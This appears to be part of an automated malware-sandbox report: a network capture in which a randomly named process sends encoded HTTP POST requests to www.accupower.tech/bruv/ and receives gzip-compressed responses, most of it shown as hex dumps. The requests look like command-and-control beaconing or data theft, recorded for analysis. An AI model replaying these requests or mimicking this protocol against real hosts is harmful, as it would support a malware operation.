Nov 25, 2024 13:57:23.396039009 CET	1236	IN	Data Raw: ee a0 57 0f e6 4e 72 4a 32 72 fc e1 6a 62 ee 85 93 8e 38 27 f3 ea 89 9b 36 8e 4b 64 70 5d cf 2e cf 96 e3 74 1a d4 77 b9 6c 0a c1 5d 1e 2e 78 56 60 ca 80 61 1e d3 74 52 83 8e e3 0e 44 e5 5f 98 e9 71 27 75 e7 ec 1f 8f e8 7a 40 43 5b 4a 89 66 2f 0a Data Ascii: WNrJ2rjb8'6Kdp].twl].xV`atRD_q'uz@C[Jf/1~MrvP88aQ?b4Ho4>xzFQ#GwNN$#/]zrZ{&,H0Jv.H%d0gk1JHtv69-OaG35l
Nov 25, 2024 13:57:23.396099091 CET	1236	IN	Data Raw: 43 4a b4 9f c6 89 0a f4 96 2e d5 02 a1 fa 7a 74 eb 85 e6 d7 71 a8 b0 ce 0f dc 41 b5 9d c3 38 4d 63 85 61 b1 75 ae 9d 34 ac 47 c6 9a 16 88 32 66 57 61 a7 1a 53 60 03 11 79 27 76 f9 6e 08 ad 14 85 02 5a df ce 7c 6b a9 23 e5 ed ed 3e 69 38 7e 66 af Data Ascii: CJ.ztqA8Mcau4G2fWaS`y'vnZ\|k#>i8~f~+aZ>t#HXm.AH:9ofvt+Zk0l&jfA,CYN'HB,q/.m%lXx)0bsr!"s)LXV#Id0\G0r
Nov 25, 2024 13:57:23.396114111 CET	1236	IN	Data Raw: b9 28 e1 b3 fe f2 1d 23 f4 aa 9f ce cf 48 e9 87 12 1d b7 65 e3 64 fd 61 cd 7d 33 b7 8f be 6f ba 94 5d e5 4b d2 1b 8a d4 1a 3c ac ee 6b f1 b4 0d 9c 13 0e 3b 0d 69 db 6d 61 f6 21 e0 65 7a d7 10 32 6a 73 c5 b1 28 11 62 95 35 b3 a7 9d b2 a5 c1 8f 5c Data Ascii: (#Heda}3o]K<k;ima!ez2js(b5\l}H<BpaAv4cSJ`rVZp2Y4a9BI{c&6ZG?gSm?5ATT<!/e(*YKUNK,YaM&}BY0NsN\|C"7y
Nov 25, 2024 13:57:23.396126032 CET	1236	IN	Data Raw: 41 bc 17 e5 e9 6e ea 04 d6 ad 26 e2 da fc 85 db 0c 79 a0 15 d4 29 a8 e0 7c 5f 0e e9 a6 1e c6 0e b8 83 f4 73 3b dd ac 4b 60 6b 04 5e 5d d4 84 03 58 1e 55 59 e6 c1 95 29 64 6c 53 43 92 57 79 ea 5d 7b 95 34 01 a9 31 f9 0c b6 4f 31 78 3c 18 c2 dd 7d Data Ascii: An&y)\|_s;K`k^]XUY)dlSCWy]{41O1x<}5:WNTB6tjX")p38uyak;v:zQyR\l(oLX(4v*<Xg[`+qR.76V:qGbn~0/APS(jQ=ML(#j.
Nov 25, 2024 13:57:23.396138906 CET	1236	IN	Data Raw: 15 20 4b 31 76 41 13 ca 60 f5 13 00 65 20 1a 3f 03 c4 fe 08 9f 22 8e da d4 8b 83 66 f2 9d 27 3d 9a 91 db 46 6f 98 be 3b e0 a7 e8 d9 cb 98 39 6e 86 46 33 cc 71 bb 35 82 67 5c 6a e6 10 22 8a b6 35 41 ad a7 eb 71 66 20 15 98 5a 82 7c e2 11 7c 5d c6 Data Ascii: K1vA`e ?"f'=Fo;9nF3q5g\j"5Aqf Z\|\|]JrDfYP$5\<3d9(ALJC N#5CEz6 V)nS@vIDix3cU%p$`v@xb>F:Sx9#}Gtd>b
Nov 25, 2024 13:57:23.396212101 CET	1236	IN	Data Raw: f1 15 a0 35 f4 6d 5b c9 78 7d 75 32 25 66 33 66 08 cb c5 03 78 17 99 9e e2 50 4c 83 af 23 f0 48 1b 2d 0a 98 58 5f f7 f2 ce fb 82 a6 46 43 77 65 89 5d b5 9b 6b 2c a1 34 c5 23 1d 0d ab 1a 54 c6 9c d4 4b 94 9c 02 14 cb 3b 22 c5 4e d1 9b 57 da dc a9 Data Ascii: 5m[x}u2%f3fxPL#H-X_FCwe]k,4#TK;"NW]\Xl\E1Db:iFR[Z [}#T94x#6zPYpq`zYWO}z=(1EY}{O[?V!C\yqzMThm, qk&+?@
Nov 25, 2024 13:57:23.396224022 CET	1236	IN	Data Raw: c5 01 9d 71 9e cf 13 68 8a 56 88 2b 6d a2 76 20 3b d4 61 3e 12 95 16 1f 47 c1 73 f2 d5 2f 2e 8a da 5f 29 8f 64 32 18 90 77 92 11 99 3a 19 e0 3b cb 5a 3f 55 4e 9b 74 6e a7 88 06 56 ae 90 36 1c 71 ba 0b ec f0 02 f6 48 b2 ce ec 50 de 18 16 17 77 e6 Data Ascii: qhV+mv ;a>Gs/._)d2w:;Z?UNtnV6qHPwh"0Ky{h%,cvj1fcbp,LykhMw!!Z9mwo148\@,\B7>}.Az^Y.?>SM#!G;p\z-{"S"A
Nov 25, 2024 13:57:23.396234989 CET	1236	IN	Data Raw: 00 c5 ae 08 9a 21 8a b0 3a 65 c8 42 74 fd 34 23 ab 89 e9 71 27 82 e6 9b 2a e4 2b 45 96 2e 4e 30 84 04 a2 bc b7 81 89 4c 08 90 09 6f d7 dc 1f c5 31 53 f3 ba 45 00 ef 5a 1c f3 e7 38 f2 78 3d 5a a9 4b 92 2e 17 80 bc 00 03 78 73 43 9d 8a 2c de 92 a8 Data Ascii: !:eBt4#q'+E.N0Lo1SEZ8x=ZK.xsC,,8az%Vl#y#ZZ[H\fe(gzTYQ?Di6z3NXTt%7[^@)DsSE3JZ{re4dJ](2{<Rv!qa'XWW
Nov 25, 2024 13:57:23.516298056 CET	1236	IN	Data Raw: b2 2d 37 a8 cf 3d 56 f3 c7 01 c0 78 21 14 69 7b 4d 58 75 1e 84 c0 f5 34 88 c2 ba b1 27 86 af c5 7d 87 d9 8b c7 80 04 14 ea cc 7a 08 df 82 1c 3a 18 f0 d0 f3 67 49 9b f1 da f7 58 5c fa 60 69 a4 e4 4e 07 85 c6 d4 87 bc b9 ba 6d 7c b2 a2 c1 20 23 12 Data Ascii: -7=Vx!i{MXu4'}z:gIX\`iNm\| #$oD},:q&qtI}#oz12f0xE/H[7\axA9vX2[G;m.@$N4vX0<!P:8?_I-tekveKy'

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50031	217.160.0.158	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:24.768070936 CET	813	OUT	POST /bruv/ HTTP/1.1 Host: www.accupower.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 234 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.accupower.tech Referer: http://www.accupower.tech/bruv/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 72 2b 6f 4d 76 33 56 69 72 6e 51 4b 78 36 4c 36 48 53 2b 62 6f 7a 78 66 72 32 34 57 48 79 74 6d 79 37 42 49 2b 4a 79 62 2f 4b 49 37 7a 58 47 77 5a 71 36 50 7a 31 6d 6c 63 79 4b 4d 72 46 30 4a 4d 4d 46 6b 5a 59 49 51 58 74 73 39 39 67 49 4d 57 48 6c 52 38 42 4a 6f 43 76 45 2f 55 68 64 55 55 2b 6f 6d 4a 53 35 50 37 56 61 52 35 47 66 71 79 2f 6a 61 44 6c 6b 54 35 43 54 6e 49 6d 4b 33 68 47 58 62 69 51 61 4b 45 42 6f 36 61 64 44 70 65 35 53 5a 79 73 34 74 74 51 46 50 76 57 54 4e 42 38 52 36 63 57 65 4e 46 32 78 44 47 6f 30 76 76 38 51 2f 51 66 7a 46 47 74 34 55 76 69 77 2f 51 75 45 2f 65 75 6a 62 79 51 30 4d 50 7a 58 58 6b 73 4e 4f 38 53 33 34 57 4a 45 35 6e 51 75 65 31 51 3d 3d Data Ascii: 0dfXG=r+oMv3VirnQKx6L6HS+bozxfr24WHytmy7BI+Jyb/KI7zXGwZq6Pz1mlcyKMrF0JMMFkZYIQXts99gIMWHlR8BJoCvE/UhdUU+omJS5P7VaR5Gfqy/jaDlkT5CTnImK3hGXbiQaKEBo6adDpe5SZys4ttQFPvWTNB8R6cWeNF2xDGo0vv8Q/QfzFGt4Uviw/QuE/eujbyQ0MPzXXksNO8S34WJE5nQue1Q==
Nov 25, 2024 13:57:26.019138098 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 25 Nov 2024 12:57:25 GMT Server: Apache Content-Encoding: gzip Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bc e9 b2 db 48 92 2e f8 ff 3e 85 6e 95 dd a9 ee 42 2a b1 6f d2 ad 6b 03 12 24 40 12 1b 41 10 5b 5b db 18 f6 7d df 91 a6 77 9f e0 d1 92 52 65 56 57 4d f7 f4 bf 3a d2 91 48 20 e0 b1 79 78 84 7f fe 39 fe 77 3a 56 e5 ff f9 1f ef c0 cf ff 4e 23 2f fc fc f1 ed eb 98 8d 65 f4 7f bc 20 98 da 66 89 fa 9f c7 28 48 df bd 7f 57 46 d9 30 4e 75 32 c4 ff d7 1f 31 8c f9 98 66 49 f4 ee e0 8d 63 d4 67 d1 b0 0d 63 54 45 a0 58 56 c7 cd ff fd e3 c3 ff 1b fe 2c f2 ad b6 b7 2a aa 68 f4 de a5 e3 d8 be 8f ba 29 9b ff f2 87 63 53 8f 51 3d be 37 b6 36 fa c3 bb e0 f3 b7 bf fc 61 8c d6 11 7e b5 f4 e3 bb 20 f5 fa 21 1a ff 32 8d f1 7b e6 0f f0 77 ed 1d c6 0d b4 f7 9b f0 57 05 f0 9f ff e7 bb ba e9 2b af cc f6 e8 e7 60 18 de 61 08 8a bd 47 c0 5f da 40 b1 0f 38 fd ee 69 1c 41 6b 5f 6d f8 00 c3 49 36 a6 93 ff 73 d0 54 70 1d 05 4d e9 0d f0 8f 8f ff 19 f6 fa 31 0b ca e8 27 6f c8 c2 e8 a7 10 74 20 2b 87 9f e2 2c 09 bc 76 cc 9a fa f5 71 ea a3 9f e2 a6 01 23 f2 d3 6b 4c 5f ff 25 7d 33 b5 [TRUNCATED] Data Ascii: 300aH.>nBok$@A[[}wReVWM:H yx9w:VN#/e f(HWF0Nu21fIcgcTEXV,h)cSQ=76a~ !2{wW+`aG_@8iAk_mI6sTpM1'ot +,vq#kL_%}3?o~%~'ogoiU4durW?you3FoOfaG`>>_"i%'G0YN#tKGbhOo0IV@>y&_i\|f{i3>x`8[!S~,>~3EG;p>3]\\wwH +K7A}_W)f"A__Gi\'-Q)OoM@Rk\|FBO`_\|/(^ZG?X4xUYZ/)]-[)aTeI1z&_zzV}?O\|<b\|h}&0pL?:m?Q#Q`/={`%]_y)K8Wi@S~{y^fuzo [TRUNCATED]
Nov 25, 2024 13:57:26.019223928 CET	1236	IN	Data Raw: 7f 79 ad cd b8 6c 96 0f 9f 6d cd a7 cf 46 f1 5b ab 3f 81 59 a8 be fb 96 45 65 08 8c fa d7 da 5e da 3d 34 65 16 be fb 63 80 bc fe 7c fc 6a 13 de 61 ed fa f1 6b f7 7e c6 c1 38 bd fb 99 7a 0d d7 bb 9f 5f 2b e8 53 19 25 51 1d 7e 95 03 26 e4 eb 48 fc Data Ascii: ylmF[?YEe^=4ec\|jak~8z_+S%Q~&H3m?{,o~5_j+`v:DE}>6}/?Oo>#WUK0Xm6e{u&<!J};boO)H{`Sw
Nov 25, 2024 13:57:26.019258976 CET	1236	IN	Data Raw: ee a0 57 0f e6 4e 72 4a 32 72 fc e1 6a 62 ee 85 93 8e 38 27 f3 ea 89 9b 36 8e 4b 64 70 5d cf 2e cf 96 e3 74 1a d4 77 b9 6c 0a c1 5d 1e 2e 78 56 60 ca 80 61 1e d3 74 52 83 8e e3 0e 44 e5 5f 98 e9 71 27 75 e7 ec 1f 8f e8 7a 40 43 5b 4a 89 66 2f 0a Data Ascii: WNrJ2rjb8'6Kdp].twl].xV`atRD_q'uz@C[Jf/1~MrvP88aQ?b4Ho4>xzFQ#GwNN$#/]zrZ{&,H0Jv.H%d0gk1JHtv69-OaG35l
Nov 25, 2024 13:57:26.019293070 CET	1236	IN	Data Raw: 43 4a b4 9f c6 89 0a f4 96 2e d5 02 a1 fa 7a 74 eb 85 e6 d7 71 a8 b0 ce 0f dc 41 b5 9d c3 38 4d 63 85 61 b1 75 ae 9d 34 ac 47 c6 9a 16 88 32 66 57 61 a7 1a 53 60 03 11 79 27 76 f9 6e 08 ad 14 85 02 5a df ce 7c 6b a9 23 e5 ed ed 3e 69 38 7e 66 af Data Ascii: CJ.ztqA8Mcau4G2fWaS`y'vnZ\|k#>i8~f~+aZ>t#HXm.AH:9ofvt+Zk0l&jfA,CYN'HB,q/.m%lXx)0bsr!"s)LXV#Id0\G0r
Nov 25, 2024 13:57:26.019364119 CET	896	IN	Data Raw: b9 28 e1 b3 fe f2 1d 23 f4 aa 9f ce cf 48 e9 87 12 1d b7 65 e3 64 fd 61 cd 7d 33 b7 8f be 6f ba 94 5d e5 4b d2 1b 8a d4 1a 3c ac ee 6b f1 b4 0d 9c 13 0e 3b 0d 69 db 6d 61 f6 21 e0 65 7a d7 10 32 6a 73 c5 b1 28 11 62 95 35 b3 a7 9d b2 a5 c1 8f 5c Data Ascii: (#Heda}3o]K<k;ima!ez2js(b5\l}H<BpaAv4cSJ`rVZp2Y4a9BI{c&6ZG?gSm?5ATT<!/e(*YKUNK,YaM&}BY0NsN\|C"7y
Nov 25, 2024 13:57:26.019399881 CET	1236	IN	Data Raw: 12 86 8e d2 f6 6b 9d 01 ae 3f 5c cb 61 2f 55 8a 84 22 47 49 1b 3b 05 db b7 f9 cf 7d 0c 99 23 e1 bc 48 fb 69 92 8f ec 6e 8a e5 e2 3e d8 07 e8 13 68 ff 35 7f e9 92 9b c9 60 9e c0 9c f2 2d 0f e6 3c 0d 05 76 33 05 76 f6 c1 9c de 3f cf 29 38 d3 a6 33 Data Ascii: k?\a/U"GI;}#Hin>h5`-<v3v?)83 o_'3J+o}zK{kq,2wK'*pvyw,_T~sWYwN>@<WAw)'P1K0kBPETgeVjUN`LSRKdYwJ]z
Nov 25, 2024 13:57:26.019434929 CET	1236	IN	Data Raw: 14 89 8a 57 56 c7 2d 04 53 84 f6 a8 c4 5e cd ea c6 96 e3 d1 61 6d 9f 41 86 94 36 40 63 d7 d8 0e 67 f1 f6 bc 13 5e 64 c1 07 e4 6a 80 e0 c2 9c f9 cc 4e 5f 4f 52 48 9d c5 e5 72 b6 47 00 37 51 04 de ce 64 6d 59 c9 a8 70 85 35 db 07 9d 06 9d e5 e6 48 Data Ascii: WV-S^amA6@cg^djN_ORHrG7QdmYp5H$:hBk)Aq8#\|JCgCPfumm/=6xPl1@+gH#)8pk]\|sVb5,sY?Xw)}98sY5U-j::^
Nov 25, 2024 13:57:26.019469023 CET	1236	IN	Data Raw: 6a 24 1f 3e 7b 40 6d 48 ee 76 72 f1 cb 31 42 11 1c 97 b8 5b 1b 30 77 fa 76 46 2e 10 be dc 23 8b 9d b8 b3 75 39 89 b4 11 22 8c 58 63 06 5b ac cc 55 57 a1 90 9b 66 82 cc e7 36 9e 07 d1 9c 06 ef 6a 0d 85 96 19 36 72 9b a0 65 09 46 82 50 c7 b8 e2 96 Data Ascii: j$>{@mHvr1B[0wvF.#u9"Xc[UWf6j6reFPbDghOCLQ!nek?UeIFb}#X2A#/>z~TnDoX,N^tQqdgkkq>dC`%3N2d0p%r#z1kg
Nov 25, 2024 13:57:26.019501925 CET	1236	IN	Data Raw: ee 38 0c d3 69 85 d5 c4 04 c4 84 4f 10 95 4b 39 e3 6e 12 25 22 f7 29 10 99 65 ba 84 bd 52 32 12 9c 09 9a c5 d6 6a 76 c2 ce 95 bc 24 62 49 66 94 92 43 b6 54 45 10 b5 1f 62 67 85 17 63 d0 ea 49 89 54 37 7b 88 4d 11 16 f4 51 38 5e 89 98 92 54 0e 47 Data Ascii: 8iOK9n%")eR2jv$bIfCTEbgcIT7{MQ8^TGX'i\|4=CJUSQ^F@`6=FUT^'qQ<X1&GS(>i\|%*}YliLhHN1c=+@4y@-D
Nov 25, 2024 13:57:26.019536018 CET	1236	IN	Data Raw: 3f 40 12 55 63 7b 76 99 0e 2f 05 5f f3 66 3c dc b4 b9 25 eb 32 26 e2 16 9c 31 e4 e6 c9 46 fa b5 ac 42 c1 36 66 a6 9a 84 07 dd 98 26 79 f2 ad c8 36 c0 86 50 a5 e1 4a b8 50 c8 5f 04 73 8a d6 5d 42 02 9d d8 50 64 d2 1e d0 51 60 eb 5d 5b 8e 20 95 35 Data Ascii: ?@Uc{v/_f<%2&1FB6f&y6PJP_s]BPdQ`][ 5WT!8jt~m6&wfH<^)at>@u<?@<my]9NX}\|`hj%csM9Q nOG5=$< s'g=`g9KG=H
Nov 25, 2024 13:57:26.139849901 CET	1236	IN	Data Raw: c4 41 f1 81 31 a6 27 6c 64 9b 18 71 a7 01 8a d3 62 87 64 01 a4 07 49 4e b0 3d 4b 32 02 99 80 d5 c4 39 89 66 de fc 9a 66 1e 68 b8 10 f1 4c d3 7e 7f 5c 6b 7e 3f 83 80 aa 34 bb 27 7a 96 5d c5 d9 a7 39 9b 9c 8d c8 21 8d f2 58 b4 ed c5 59 67 d3 27 fc Data Ascii: A1'ldqbdIN=K29ffhL~\k~?4'z]9!XYg' yv}vZLZ$zLbQc}cL9J\/ !G,92'x_86irwBz:Kw[}J^LX]3-QTCa5'/KahdJc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50032	217.160.0.158	80	3328	C:\Program Files (x86)\KsAbjxnfRomHREeeFwXVZZDoIDFHmaxVzTjxOZcfPwBquTNWSye\fXZvHKoWCzop.exe

Timestamp	Bytes transferred	Direction	Data
Nov 25, 2024 13:57:27.431988001 CET	1826	OUT	POST /bruv/ HTTP/1.1 Host: www.accupower.tech Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US Accept-Encoding: gzip, deflate Content-Length: 1246 Connection: close Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Origin: http://www.accupower.tech Referer: http://www.accupower.tech/bruv/ User-Agent: Mozilla/5.0 (Linux; Android 4.3; C6530N Build/JLS36C) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.114 Mobile Safari/537.36 Data Raw: 30 64 66 58 47 3d 72 2b 6f 4d 76 33 56 69 72 6e 51 4b 78 36 4c 36 48 53 2b 62 6f 7a 78 66 72 32 34 57 48 79 74 6d 79 37 42 49 2b 4a 79 62 2f 4b 41 37 77 6c 65 77 5a 4c 36 50 79 31 6d 6c 48 79 4b 52 72 46 30 75 4d 4d 64 67 5a 59 45 41 58 75 45 39 38 46 63 4d 58 32 6c 52 79 42 4a 6f 4b 50 45 2b 51 68 63 4f 55 2b 35 76 4a 53 70 50 37 56 61 52 35 48 50 71 37 4f 6a 61 46 6c 6b 55 70 53 54 72 4d 6d 4c 65 68 43 7a 4c 69 51 50 33 45 79 51 36 5a 35 6e 70 4e 72 4b 5a 36 73 34 72 73 51 46 48 76 57 66 57 42 38 4d 42 63 57 43 6a 46 32 46 44 46 63 70 33 35 39 30 47 4a 5a 72 2b 47 61 34 65 32 47 45 63 56 4d 63 45 61 50 50 6f 31 44 63 37 58 55 37 34 69 61 59 36 32 55 2f 7a 59 4f 39 2b 74 54 44 6c 6f 55 6d 41 68 43 78 6e 42 72 73 71 37 78 67 32 71 42 2b 72 74 58 47 77 32 78 34 79 5a 61 62 75 59 4b 39 45 68 4d 63 77 48 51 38 51 58 66 37 5a 75 38 36 57 4c 69 50 75 57 57 76 38 43 6d 71 31 2f 2f 7a 46 59 2b 79 73 79 72 39 50 57 77 44 79 30 33 69 4d 37 41 67 55 6c 49 63 39 4b 58 6c 56 53 30 2f 32 6d 73 54 2f 30 43 74 72 [TRUNCATED] Data Ascii: 0dfXG=r+oMv3VirnQKx6L6HS+bozxfr24WHytmy7BI+Jyb/KA7wlewZL6Py1mlHyKRrF0uMMdgZYEAXuE98FcMX2lRyBJoKPE+QhcOU+5vJSpP7VaR5HPq7OjaFlkUpSTrMmLehCzLiQP3EyQ6Z5npNrKZ6s4rsQFHvWfWB8MBcWCjF2FDFcp3590GJZr+Ga4e2GEcVMcEaPPo1Dc7XU74iaY62U/zYO9+tTDloUmAhCxnBrsq7xg2qB+rtXGw2x4yZabuYK9EhMcwHQ8QXf7Zu86WLiPuWWv8Cmq1//zFY+ysyr9PWwDy03iM7AgUlIc9KXlVS0/2msT/0CtrV+Z8Q1GACbBCYHyLrmt+XxhQwHn95Pq9uMq3J54WakzjrWbqdsuYfgrGHzEIa3HayCxTLddnTqteOsBAIB3syDVWol7AUiAvEzZbofGsxhJ+9Wfba/x5OrlGEgVHkfsePqawI57xr7MWNZRJmmKSyfuDqR9f0884axeOWTeXN3fMLV75ew7tauG1w1JO0woG4un/rtcQq+cS23deWGcHE/pLm3g7yQ/VJgmgsCw/Q6cETQQv/oNOVhwWeMZYooNINLIAn31X1ift4wRmwcigfWi9JdlDInk/KHW9V8/HzO+V74CexO7Hlv5vZwFTX8OoX9m/vSQl0oY739lNwB14he/s1qtaP16FijBH0B1ZRElN1ROqcdhaNXhO28uTlsMZfKuGC8GWSiuT8wzQ1MlEIAItvSWo0bYxKczDKO59F/9YFyHCiD+cU5UZqTUZuGv24wmJCBjiGm8zTwjGr74eoHbUaz2zPPQ4fnjitg0UDVL1GhuAR82Jb6wQLsMrSPWj5IAeltBBfPrqojqg2f8IQwbg4IxmBYIM8xdkb6PArOuESh91eGbvc0uIv7CW58CITvGTjLY2PD57hixO7yJBrrhgHrfh686UN0GY6rttAucbIzEJWB94/CRVh6vYYOoqdLTWotYZ/qRzF7AaDyeX2xbiN0JrtQ3W8u [TRUNCATED]
Nov 25, 2024 13:57:28.799093962 CET	1236	IN	HTTP/1.1 200 OK Content-Type: text/html Transfer-Encoding: chunked Connection: close Date: Mon, 25 Nov 2024 12:57:28 GMT Server: Apache Content-Encoding: gzip Data Raw: 33 30 30 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ec bc e9 b2 db 48 92 2e f8 ff 3e 85 6e 95 dd a9 ee 42 2a b1 6f d2 ad 6b 03 12 24 40 12 1b 41 10 5b 5b db 18 f6 7d df 91 a6 77 9f e0 d1 92 52 65 56 57 4d f7 f4 bf 3a d2 91 48 20 e0 b1 79 78 84 7f fe 39 fe 77 3a 56 e5 ff f9 1f ef c0 cf ff 4e 23 2f fc fc f1 ed eb 98 8d 65 f4 7f bc 20 98 da 66 89 fa 9f c7 28 48 df bd 7f 57 46 d9 30 4e 75 32 c4 ff d7 1f 31 8c f9 98 66 49 f4 ee e0 8d 63 d4 67 d1 b0 0d 63 54 45 a0 58 56 c7 cd ff fd e3 c3 ff 1b fe 2c f2 ad b6 b7 2a aa 68 f4 de a5 e3 d8 be 8f ba 29 9b ff f2 87 63 53 8f 51 3d be 37 b6 36 fa c3 bb e0 f3 b7 bf fc 61 8c d6 11 7e b5 f4 e3 bb 20 f5 fa 21 1a ff 32 8d f1 7b e6 0f f0 77 ed 1d c6 0d b4 f7 9b f0 57 05 f0 9f ff e7 bb ba e9 2b af cc f6 e8 e7 60 18 de 61 08 8a bd 47 c0 5f da 40 b1 0f 38 fd ee 69 1c 41 6b 5f 6d f8 00 c3 49 36 a6 93 ff 73 d0 54 70 1d 05 4d e9 0d f0 8f 8f ff 19 f6 fa 31 0b ca e8 27 6f c8 c2 e8 a7 10 74 20 2b 87 9f e2 2c 09 bc 76 cc 9a fa f5 71 ea a3 9f e2 a6 01 23 f2 d3 6b 4c 5f ff 25 7d 33 b5 [TRUNCATED] Data Ascii: 300aH.>nBok$@A[[}wReVWM:H yx9w:VN#/e f(HWF0Nu21fIcgcTEXV,h)cSQ=76a~ !2{wW+`aG_@8iAk_mI6sTpM1'ot +,vq#kL_%}3?o~%~'ogoiU4durW?you3FoOfaG`>>_"i%'G0YN#tKGbhOo0IV@>y&_i\|f{i3>x`8[!S~,>~3EG;p>3]\\wwH +K7A}_W)f"A__Gi\'-Q)OoM@Rk\|FBO`_\|/(^ZG?X4xUYZ/)]-[)aTeI1z&_zzV}?O\|<b\|h}&0pL?:m?Q#Q`/={`%]_y)K8Wi@S~{y^fuzo [TRUNCATED]
Nov 25, 2024 13:57:28.799123049 CET	1236	IN	Data Raw: 7f 79 ad cd b8 6c 96 0f 9f 6d cd a7 cf 46 f1 5b ab 3f 81 59 a8 be fb 96 45 65 08 8c fa d7 da 5e da 3d 34 65 16 be fb 63 80 bc fe 7c fc 6a 13 de 61 ed fa f1 6b f7 7e c6 c1 38 bd fb 99 7a 0d d7 bb 9f 5f 2b e8 53 19 25 51 1d 7e 95 03 26 e4 eb 48 fc Data Ascii: ylmF[?YEe^=4ec\|jak~8z_+S%Q~&H3m?{,o~5_j+`v:DE}>6}/?Oo>#WUK0Xm6e{u&<!J};boO)H{`Sw
Nov 25, 2024 13:57:28.799140930 CET	1236	IN	Data Raw: ee a0 57 0f e6 4e 72 4a 32 72 fc e1 6a 62 ee 85 93 8e 38 27 f3 ea 89 9b 36 8e 4b 64 70 5d cf 2e cf 96 e3 74 1a d4 77 b9 6c 0a c1 5d 1e 2e 78 56 60 ca 80 61 1e d3 74 52 83 8e e3 0e 44 e5 5f 98 e9 71 27 75 e7 ec 1f 8f e8 7a 40 43 5b 4a 89 66 2f 0a Data Ascii: WNrJ2rjb8'6Kdp].twl].xV`atRD_q'uz@C[Jf/1~MrvP88aQ?b4Ho4>xzFQ#GwNN$#/]zrZ{&,H0Jv.H%d0gk1JHtv69-OaG35l
Nov 25, 2024 13:57:28.799153090 CET	1236	IN	Data Raw: 43 4a b4 9f c6 89 0a f4 96 2e d5 02 a1 fa 7a 74 eb 85 e6 d7 71 a8 b0 ce 0f dc 41 b5 9d c3 38 4d 63 85 61 b1 75 ae 9d 34 ac 47 c6 9a 16 88 32 66 57 61 a7 1a 53 60 03 11 79 27 76 f9 6e 08 ad 14 85 02 5a df ce 7c 6b a9 23 e5 ed ed 3e 69 38 7e 66 af Data Ascii: CJ.ztqA8Mcau4G2fWaS`y'vnZ\|k#>i8~f~+aZ>t#HXm.AH:9ofvt+Zk0l&jfA,CYN'HB,q/.m%lXx)0bsr!"s)LXV#Id0\G0r
Nov 25, 2024 13:57:28.799164057 CET	1236	IN	Data Raw: b9 28 e1 b3 fe f2 1d 23 f4 aa 9f ce cf 48 e9 87 12 1d b7 65 e3 64 fd 61 cd 7d 33 b7 8f be 6f ba 94 5d e5 4b d2 1b 8a d4 1a 3c ac ee 6b f1 b4 0d 9c 13 0e 3b 0d 69 db 6d 61 f6 21 e0 65 7a d7 10 32 6a 73 c5 b1 28 11 62 95 35 b3 a7 9d b2 a5 c1 8f 5c Data Ascii: (#Heda}3o]K<k;ima!ez2js(b5\l}H<BpaAv4cSJ`rVZp2Y4a9BI{c&6ZG?gSm?5ATT<!/e(*YKUNK,YaM&}BY0NsN\|C"7y
Nov 25, 2024 13:57:28.799175978 CET	1236	IN	Data Raw: 41 bc 17 e5 e9 6e ea 04 d6 ad 26 e2 da fc 85 db 0c 79 a0 15 d4 29 a8 e0 7c 5f 0e e9 a6 1e c6 0e b8 83 f4 73 3b dd ac 4b 60 6b 04 5e 5d d4 84 03 58 1e 55 59 e6 c1 95 29 64 6c 53 43 92 57 79 ea 5d 7b 95 34 01 a9 31 f9 0c b6 4f 31 78 3c 18 c2 dd 7d Data Ascii: An&y)\|_s;K`k^]XUY)dlSCWy]{41O1x<}5:WNTB6tjX")p38uyak;v:zQyR\l(oLX(4v*<Xg[`+qR.76V:qGbn~0/APS(jQ=ML(#j.
Nov 25, 2024 13:57:28.799384117 CET	1236	IN	Data Raw: 15 20 4b 31 76 41 13 ca 60 f5 13 00 65 20 1a 3f 03 c4 fe 08 9f 22 8e da d4 8b 83 66 f2 9d 27 3d 9a 91 db 46 6f 98 be 3b e0 a7 e8 d9 cb 98 39 6e 86 46 33 cc 71 bb 35 82 67 5c 6a e6 10 22 8a b6 35 41 ad a7 eb 71 66 20 15 98 5a 82 7c e2 11 7c 5d c6 Data Ascii: K1vA`e ?"f'=Fo;9nF3q5g\j"5Aqf Z\|\|]JrDfYP$5\<3d9(ALJC N#5CEz6 V)nS@vIDix3cU%p$`v@xb>F:Sx9#}Gtd>b
Nov 25, 2024 13:57:28.799431086 CET	1236	IN	Data Raw: f1 15 a0 35 f4 6d 5b c9 78 7d 75 32 25 66 33 66 08 cb c5 03 78 17 99 9e e2 50 4c 83 af 23 f0 48 1b 2d 0a 98 58 5f f7 f2 ce fb 82 a6 46 43 77 65 89 5d b5 9b 6b 2c a1 34 c5 23 1d 0d ab 1a 54 c6 9c d4 4b 94 9c 02 14 cb 3b 22 c5 4e d1 9b 57 da dc a9 Data Ascii: 5m[x}u2%f3fxPL#H-X_FCwe]k,4#TK;"NW]\Xl\E1Db:iFR[Z [}#T94x#6zPYpq`zYWO}z=(1EY}{O[?V!C\yqzMThm, qk&+?@
